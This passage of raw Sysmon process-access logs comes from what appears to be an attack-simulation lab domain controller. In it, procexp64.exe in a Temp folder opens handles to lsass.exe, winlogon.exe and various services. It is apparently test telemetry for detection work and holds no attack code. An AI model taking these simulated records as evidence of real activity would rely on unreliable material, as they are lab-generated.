dows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785323Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785322Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785321Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785320Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785319Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785318Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785317Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785316Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785315Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785314Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785313Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785312Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785311Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785310Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785309Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785308Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785307Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785306Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785305Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785304Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785303Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.237{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785302Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 